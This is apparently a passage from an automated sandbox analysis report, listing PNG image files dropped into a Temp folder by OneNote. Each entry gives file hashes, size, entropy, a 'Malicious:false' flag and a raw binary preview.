                                                                                                                                                    Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{EDDCBD3A-B136-4E2C-B697-CF22AC4579C2}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1570
                                                                                                                                                    Entropy (8bit):7.780157858994452
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                    MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                    SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                    SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                    SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{EEDB1528-5280-4554-A684-B515CB7987DD}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1570
                                                                                                                                                    Entropy (8bit):7.780157858994452
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                    MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                    SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                    SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                    SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{EEFB8C19-B408-462C-A17E-C7DBFADA5015}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2332
                                                                                                                                                    Entropy (8bit):7.8822150338370776
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                    MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                    SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                    SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                    SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{F36F0537-9D20-4390-9EC6-2D1AA2CC9790}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2270
                                                                                                                                                    Entropy (8bit):7.845368393313232
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                    MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                    SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                    SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                    SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{F66BEA49-4A57-4978-8A2C-8E1302D6AF82}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4081
                                                                                                                                                    Entropy (8bit):7.943373267196131
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                    MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                    SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                    SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                    SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{F738F501-17B9-462B-B111-43A39B2ECBEA}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13030
                                                                                                                                                    Entropy (8bit):7.948664903731204
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                    MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                    SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                    SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                    SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{F778F4F7-1BFE-4B7F-8503-410F443F91FC}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{F794AD99-3F51-417C-BFCB-7C924053727A}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11886
                                                                                                                                                    Entropy (8bit):7.946442244439929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                    MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                    SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                    SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                    SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{F8834DE5-0E6E-490C-ACD6-23D1F81133D7}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4847
                                                                                                                                                    Entropy (8bit):7.950192613458318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                    MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                    SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                    SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                    SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{F924DE40-D7C5-4099-A702-9ED9FAE8AC12}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2270
                                                                                                                                                    Entropy (8bit):7.845368393313232
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                    MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                    SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                    SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                    SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{F9753E7D-73AC-4CAF-9E39-A0E088FC3E53}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{FAA44344-2C3E-496E-994B-4AF6853B02FA}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1924
                                                                                                                                                    Entropy (8bit):7.836744258175623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                    MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                    SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                    SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                    SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                    Malicious:false
